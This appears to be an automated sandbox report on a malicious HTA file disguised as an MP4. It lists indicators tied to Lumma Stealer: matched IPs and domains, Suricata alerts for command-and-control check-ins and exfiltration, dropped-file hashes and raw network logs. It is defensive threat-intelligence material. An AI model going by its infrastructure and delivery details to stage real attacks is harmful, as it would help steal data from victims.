                                                                              • Execution Graph export aborted for target powershell.exe, PID 5844 because it is empty
                                                                              • Execution Graph export aborted for target powershell.exe, PID 744 because it is empty
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              TimeTypeDescription
                                                                              07:54:55API Interceptor1x Sleep call for process: mshta.exe modified
                                                                              07:54:55API Interceptor95x Sleep call for process: powershell.exe modified
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              104.21.16.1JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              • 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                                                                              172.67.208.58Setup.exeGet hashmaliciousLummaCBrowse
                                                                                installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        setup.exeGet hashmaliciousLummaCBrowse
                                                                                          installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                            MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                              @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                does virginia have a no chase law for motorcycles 62848.jsGet hashmaliciousUnknownBrowse
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  quantitypitt.clickSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.186.189
                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.186.189
                                                                                                  klipvumisui.shopSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.208.58
                                                                                                  installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 172.67.208.58
                                                                                                  Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.208.58
                                                                                                  'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.37.128
                                                                                                  Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.208.58
                                                                                                  SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.37.128
                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.208.58
                                                                                                  Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.37.128
                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.37.128
                                                                                                  Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 104.21.37.128
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  CLOUDFLARENETUShttp://www.housepricesintheuk.co.ukGet hashmaliciousUnknownBrowse
                                                                                                  • 172.64.155.119
                                                                                                  APLICATIVO-WINDOWS-NOTA-FISCAL.msiGet hashmaliciousAteraAgentBrowse
                                                                                                  • 104.18.18.106
                                                                                                  https://pwv95gp5r-xn--r3h9jdud-xn----c1a2cj-xn----p1ai.translate.goog/sIQKSvTC/b8KvU/uoTt6?ZFhObGNpNXBiblp2YkhabGJXVnVkRUJ6YjNWMGFHVnliblJ5ZFhOMExtaHpZMjVwTG01bGRBPT06c1JsOUE+&_x_tr_sch=http&_x_tr_sl=hrLWHGLm&_x_tr_tl=bTtllyqlGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.17.25.14
                                                                                                  Agent381.msiGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.208.58
                                                                                                  https://o365info.com/get-unlicensed-onedrive-accounts/Get hashmaliciousUnknownBrowse
                                                                                                  • 104.18.27.193
                                                                                                  AZfDGVWF68.pdfGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  https://czfc104.na1.hubspotlinks.com/Ctc/RI+113/cZFc104/VVpBhY3Y-LTWW3Cvl9B8hKRPtVVm64t5qdmRWN1f4_WP7mt9FW50l5tj6lZ3lNW8SvDYK4v65T-W5VNxKh8dLcmKW1GlXcL834zD3W5w7v_71CDbKVV4Dsjr5FnQ2PVSHlbR3pc5MwW72kzKm6WrbY7W6NJh0_7GRxDMW2K2WDT2ZPr4xW3b_gtn2bnp5xW7Hn0F58SN9mqN4_D9_QrtgD8VBy-hV2j1qrbW3N54fh8gXkqCW6JcyP11p5DmRW6d2nj72MkQXgW6hgqJx7Gc_ycW5DT-Pm451FQhW4Tph0s8GNtc-W58sq8G9dpW27W5S3wzf7rNLv_Vn6h606T2B8YN4yb6VRDg_G5W36Gvt_2lnk9qW2LykX37R4KRSW1F2tHT3jrLyjW7hSkG572MN4TW75KrBz5T-zFkVLJYW27hKs9nW3h3Pmh907wxLW2Zzdnn98hQC7W2Qnk7D31ZBJjW83tNvQ2nNht5W1HJvHm95P722W55gfDx9lT1vDW1ykGr_219m_RW5ff63S7MhCcQW4_QfK_5TQdprVlF4dm2DH-ctW6mF-BW36YwwNW99r61n6mmMhVW2v1J7Q5mVXz2W53lcRT6L4fsVN8gyZcXY0MfLW2kLwLd1TYk1wW7MzDQt4QNh6nW1bMMpS84VG-SW6F_Tym5bK06Qf6rQzB604Get hashmaliciousUnknownBrowse
                                                                                                  • 104.16.117.116
                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.18.26.149
                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.18.26.149
                                                                                                  CLOUDFLARENETUShttp://www.housepricesintheuk.co.ukGet hashmaliciousUnknownBrowse
                                                                                                  • 172.64.155.119
                                                                                                  APLICATIVO-WINDOWS-NOTA-FISCAL.msiGet hashmaliciousAteraAgentBrowse
                                                                                                  • 104.18.18.106
                                                                                                  https://pwv95gp5r-xn--r3h9jdud-xn----c1a2cj-xn----p1ai.translate.goog/sIQKSvTC/b8KvU/uoTt6?ZFhObGNpNXBiblp2YkhabGJXVnVkRUJ6YjNWMGFHVnliblJ5ZFhOMExtaHpZMjVwTG01bGRBPT06c1JsOUE+&_x_tr_sch=http&_x_tr_sl=hrLWHGLm&_x_tr_tl=bTtllyqlGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.17.25.14
                                                                                                  Agent381.msiGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.208.58
                                                                                                  https://o365info.com/get-unlicensed-onedrive-accounts/Get hashmaliciousUnknownBrowse
                                                                                                  • 104.18.27.193
                                                                                                  AZfDGVWF68.pdfGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  https://czfc104.na1.hubspotlinks.com/Ctc/RI+113/cZFc104/VVpBhY3Y-LTWW3Cvl9B8hKRPtVVm64t5qdmRWN1f4_WP7mt9FW50l5tj6lZ3lNW8SvDYK4v65T-W5VNxKh8dLcmKW1GlXcL834zD3W5w7v_71CDbKVV4Dsjr5FnQ2PVSHlbR3pc5MwW72kzKm6WrbY7W6NJh0_7GRxDMW2K2WDT2ZPr4xW3b_gtn2bnp5xW7Hn0F58SN9mqN4_D9_QrtgD8VBy-hV2j1qrbW3N54fh8gXkqCW6JcyP11p5DmRW6d2nj72MkQXgW6hgqJx7Gc_ycW5DT-Pm451FQhW4Tph0s8GNtc-W58sq8G9dpW27W5S3wzf7rNLv_Vn6h606T2B8YN4yb6VRDg_G5W36Gvt_2lnk9qW2LykX37R4KRSW1F2tHT3jrLyjW7hSkG572MN4TW75KrBz5T-zFkVLJYW27hKs9nW3h3Pmh907wxLW2Zzdnn98hQC7W2Qnk7D31ZBJjW83tNvQ2nNht5W1HJvHm95P722W55gfDx9lT1vDW1ykGr_219m_RW5ff63S7MhCcQW4_QfK_5TQdprVlF4dm2DH-ctW6mF-BW36YwwNW99r61n6mmMhVW2v1J7Q5mVXz2W53lcRT6L4fsVN8gyZcXY0MfLW2kLwLd1TYk1wW7MzDQt4QNh6nW1bMMpS84VG-SW6F_Tym5bK06Qf6rQzB604Get hashmaliciousUnknownBrowse
                                                                                                  • 104.16.117.116
                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.18.26.149
                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.18.26.149
                                                                                                  CLOUDFLARENETUShttp://www.housepricesintheuk.co.ukGet hashmaliciousUnknownBrowse
                                                                                                  • 172.64.155.119
                                                                                                  APLICATIVO-WINDOWS-NOTA-FISCAL.msiGet hashmaliciousAteraAgentBrowse
                                                                                                  • 104.18.18.106
                                                                                                  https://pwv95gp5r-xn--r3h9jdud-xn----c1a2cj-xn----p1ai.translate.goog/sIQKSvTC/b8KvU/uoTt6?ZFhObGNpNXBiblp2YkhabGJXVnVkRUJ6YjNWMGFHVnliblJ5ZFhOMExtaHpZMjVwTG01bGRBPT06c1JsOUE+&_x_tr_sch=http&_x_tr_sl=hrLWHGLm&_x_tr_tl=bTtllyqlGet hashmaliciousHTMLPhisherBrowse
                                                                                                  • 104.17.25.14
                                                                                                  Agent381.msiGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 172.67.208.58
                                                                                                  https://o365info.com/get-unlicensed-onedrive-accounts/Get hashmaliciousUnknownBrowse
                                                                                                  • 104.18.27.193
                                                                                                  AZfDGVWF68.pdfGet hashmaliciousUnknownBrowse
                                                                                                  • 188.114.96.3
                                                                                                  https://czfc104.na1.hubspotlinks.com/Ctc/RI+113/cZFc104/VVpBhY3Y-LTWW3Cvl9B8hKRPtVVm64t5qdmRWN1f4_WP7mt9FW50l5tj6lZ3lNW8SvDYK4v65T-W5VNxKh8dLcmKW1GlXcL834zD3W5w7v_71CDbKVV4Dsjr5FnQ2PVSHlbR3pc5MwW72kzKm6WrbY7W6NJh0_7GRxDMW2K2WDT2ZPr4xW3b_gtn2bnp5xW7Hn0F58SN9mqN4_D9_QrtgD8VBy-hV2j1qrbW3N54fh8gXkqCW6JcyP11p5DmRW6d2nj72MkQXgW6hgqJx7Gc_ycW5DT-Pm451FQhW4Tph0s8GNtc-W58sq8G9dpW27W5S3wzf7rNLv_Vn6h606T2B8YN4yb6VRDg_G5W36Gvt_2lnk9qW2LykX37R4KRSW1F2tHT3jrLyjW7hSkG572MN4TW75KrBz5T-zFkVLJYW27hKs9nW3h3Pmh907wxLW2Zzdnn98hQC7W2Qnk7D31ZBJjW83tNvQ2nNht5W1HJvHm95P722W55gfDx9lT1vDW1ykGr_219m_RW5ff63S7MhCcQW4_QfK_5TQdprVlF4dm2DH-ctW6mF-BW36YwwNW99r61n6mmMhVW2v1J7Q5mVXz2W53lcRT6L4fsVN8gyZcXY0MfLW2kLwLd1TYk1wW7MzDQt4QNh6nW1bMMpS84VG-SW6F_Tym5bK06Qf6rQzB604Get hashmaliciousUnknownBrowse
                                                                                                  • 104.16.117.116
                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.18.26.149
                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.18.26.149
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eAgent381.msiGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.16.1
                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.16.1
                                                                                                  Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 104.21.16.1
                                                                                                  yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 104.21.16.1
                                                                                                  ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 104.21.16.1
                                                                                                  Ref#66001032.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                  • 104.21.16.1
                                                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 104.21.16.1
                                                                                                  kP8EgMorTr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 104.21.16.1
                                                                                                  ny9LDJr6pA.exeGet hashmaliciousQuasarBrowse
                                                                                                  • 104.21.16.1
                                                                                                  a0e9f5d64349fb13191bc781f81f42e1Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.43.229
                                                                                                  • 172.67.208.58
                                                                                                  PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  • 104.21.43.229
                                                                                                  • 172.67.208.58
                                                                                                  un30brGAKP.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.43.229
                                                                                                  • 172.67.208.58
                                                                                                  Patcher_I5cxa9AN.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.43.229
                                                                                                  • 172.67.208.58
                                                                                                  DansMinistrie.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.43.229
                                                                                                  • 172.67.208.58
                                                                                                  CrosshairX.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.43.229
                                                                                                  • 172.67.208.58
                                                                                                  installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  • 104.21.43.229
                                                                                                  • 172.67.208.58
                                                                                                  Installer_x64.exeGet hashmaliciousLummaCBrowse
                                                                                                  • 104.21.43.229
                                                                                                  • 172.67.208.58
                                                                                                  Installer.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                  • 104.21.43.229
                                                                                                  • 172.67.208.58
                                                                                                  No context
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5829
                                                                                                  Entropy (8bit):4.901113710259376
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                  MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                  SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                  SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                  SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                  Malicious:false
                                                                                                  Reputation:moderate, very likely benign file
                                                                                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):64
                                                                                                  Entropy (8bit):0.6599547231656377
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Nllluly/:NllU
                                                                                                  MD5:CD58C7193AF7B74B8F5AB012CEAA83D1
                                                                                                  SHA1:48F5F741531E2611CC155853BB9BFCF470AD2262
                                                                                                  SHA-256:AA0870FDCF90E60FC4555437FED5E92D49DE3A7C81E2E66D5763B25CF58EE4D7
                                                                                                  SHA-512:B2F920ED07178691B4568D9459954BE281284DBA8E5DAC76147764180AE78306E32630098A1EA2F8D5721E56B87EE80E6C96BF73E96F44D3A19F15759613F3CF
                                                                                                  Malicious:false
                                                                                                  Preview:@...e...........................................................
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  File type:exported SGML document, ASCII text, with very long lines (306), with CRLF, CR line terminators
                                                                                                  Entropy (8bit):6.605540818736945
                                                                                                  TrID:
                                                                                                  • HyperText Markup Language (12001/1) 100.00%
                                                                                                  File name:title.mp4.hta
                                                                                                  File size:2'727'626 bytes
                                                                                                  MD5:5ffa4145e79128ab1c56abfb5a8455d7
                                                                                                  SHA1:e8cec6950853414976683615b1467b1d4dae8ee6
                                                                                                  SHA256:3cf8f04202e09ddfff4c1febc10873a38258116fadd806ce1110f36445bbeaf0
                                                                                                  SHA512:b0c4356886e40cc9dce4eb2c0918ed4ef88dc9ef7441963d89ff3c0790d2e49b3319ea3a26094a496350163eb98f39888822bbf67530e38a5bd32a427e7884c1
                                                                                                  SSDEEP:49152:SSQwzfrpqz053/ySQwzfrpqzoSQwzfrpqzoSQwzfrpqzd:SgIVgIsgI0gIR
                                                                                                  TLSH:ABC523B91D9E4D84C74C21D01ECE5CE85C8C97C86D4F51DA348ECAD2B6EBB296CDD0A4
                                                                                                  File Content Preview: Re'wC2$F?qvy%_+,ia4*vS8@;..7q4F\bzdD~L:'Aiywh8{!5@jMwK;X!}h%U%(AsHx/oh<e#&w~NqDuelpb\,P*Iaw?ot-W(q"8uG\wM1s.1c)@5vsq)B<+sB[VoN.H?o><2>)e__3ZRp4c5FB#9pU5Id)d*dk`y\%CT'{PpWJ.RDmX'd 5A}F{X;mtR.(4"&.._rkGs;|z5:w.sm./#.dD,tmN*.LP]GR2Eq.@61};5A_AkbPIBKXdG\
                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2025-01-06T13:56:30.938062+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449953104.21.43.229443TCP
                                                                                                  2025-01-06T13:56:31.375737+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449953104.21.43.229443TCP
                                                                                                  2025-01-06T13:56:31.375737+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449953104.21.43.229443TCP
                                                                                                  2025-01-06T13:56:31.864224+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449960104.21.43.229443TCP
                                                                                                  2025-01-06T13:56:32.346808+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449960104.21.43.229443TCP
                                                                                                  2025-01-06T13:56:32.346808+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449960104.21.43.229443TCP
                                                                                                  2025-01-06T13:56:33.013742+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449966104.21.43.229443TCP
                                                                                                  2025-01-06T13:56:33.695995+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449966104.21.43.229443TCP
                                                                                                  2025-01-06T13:56:34.204186+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449977104.21.43.229443TCP
                                                                                                  2025-01-06T13:56:35.188871+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449983104.21.43.229443TCP
                                                                                                  2025-01-06T13:56:37.285044+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449998104.21.43.229443TCP
                                                                                                  2025-01-06T13:56:40.665653+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450014104.21.43.229443TCP
                                                                                                  2025-01-06T13:56:41.878622+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450015104.21.43.229443TCP
                                                                                                  2025-01-06T13:56:41.885677+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.450015104.21.43.229443TCP
                                                                                                  2025-01-06T13:56:43.941915+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450016104.21.43.229443TCP
                                                                                                  2025-01-06T13:56:44.440999+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450016104.21.43.229443TCP
                                                                                                  2025-01-06T13:56:44.936488+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450017172.67.208.58443TCP
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 6, 2025 13:55:17.998002052 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:17.998023987 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:17.998131037 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:18.007272959 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:18.007285118 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:18.474662066 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:18.474757910 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:18.526321888 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:18.526338100 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:18.526557922 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:18.582406044 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:18.640477896 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:18.683336020 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:18.984139919 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:18.984181881 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:18.984220028 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:18.984244108 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:18.984246969 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:18.984262943 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:18.984299898 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:18.984308004 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:18.984358072 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:18.984385967 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:18.984402895 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:18.984407902 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:18.984421968 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:18.985060930 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:18.985115051 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:18.985121012 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:19.035497904 CET49741443192.168.2.4104.21.16.1
                                                                                                  Jan 6, 2025 13:55:19.070192099 CET44349741104.21.16.1192.168.2.4
                                                                                                  Jan 6, 2025 13:55:19.073218107 CET44349741104.21.16.1192.168.2.4
